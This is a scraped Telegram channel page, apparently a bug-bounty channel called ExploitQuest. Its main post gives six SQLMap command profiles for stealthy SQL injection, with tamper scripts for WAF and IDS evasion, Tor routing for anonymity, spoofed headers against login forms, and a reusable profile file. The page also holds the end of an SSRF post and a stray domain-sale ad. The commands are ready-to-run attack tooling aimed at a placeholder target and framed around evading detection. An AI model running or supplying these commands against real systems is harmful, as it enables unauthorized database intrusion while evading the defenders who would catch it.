Conclusion: SSRF attacks may be subtle but extremely dangerous. Through careful inspection, intelligent payload design, and out-of-band detection, you can uncover hidden internal networks and access sensitive information.

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass

Please open Telegram to view this post

VIEW IN TELEGRAM

Attacker

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.

🔥5❤3👍1🥰1

2.58K views08:59

ExploitQuest

Here’s a powerful list of 💻 SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).

These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.

✅ 1. Stealth Mode (WAF Bypass + Delay)

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2

🔘 Use Case: Slow, stealthy testing to avoid WAF/IPS.

━━━━━━━━━━━━━━━━━━

✅ 2. Aggressive Mode with WAF Evasion

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ

🔘 Use Case: For deeper exploitation when stealth is less critical.

━━━━━━━━━━━━━━━━━━

✅

3. Blind Time-Based SQLi Detection

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch

🔘 Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.

━━━━━━━━━━━━━━━━━━

✅ 4. Obfuscated Payloads for Bypassing WAFs

sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch

🔘 Use Case: When facing intelligent WAFs that detect classic patterns.

━━━━━━━━━━━━━━━━━━

✅ 5. POST Parameter Injection with Custom Headers

sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch

🔘 Use Case: Bypassing login forms and tricking WAFs using header spoofing.

━━━━━━━━━━━━━━━━━━

✅ 6. Using TOR with WAF Evasion

sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch

🔘 Use Case: Anonymous testing through TOR while bypassing WAF.

━━━━━━━━━━━━━━━━━━

🔧 Recommended Tamper Scripts

| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with comments (`/**/`)
| `charunicodeescape` | Unicode-escapes payload characters
| `randomcase` | Randomizes keyword casing
| `between` | Obfuscates `WHERE` conditions
| `versionedkeywords` | Adds versioned comments before SQL keywords
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Bypasses magic quotes
| `modsecurityversioned` | Targets ModSecurity WAF bypass

💡 Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:

# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ

Then run:

sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass

Please open Telegram to view this post

VIEW IN TELEGRAM

❤11🔥4🥰1

3.18K viewsedited 02:58

About

Blog

Apps

Platform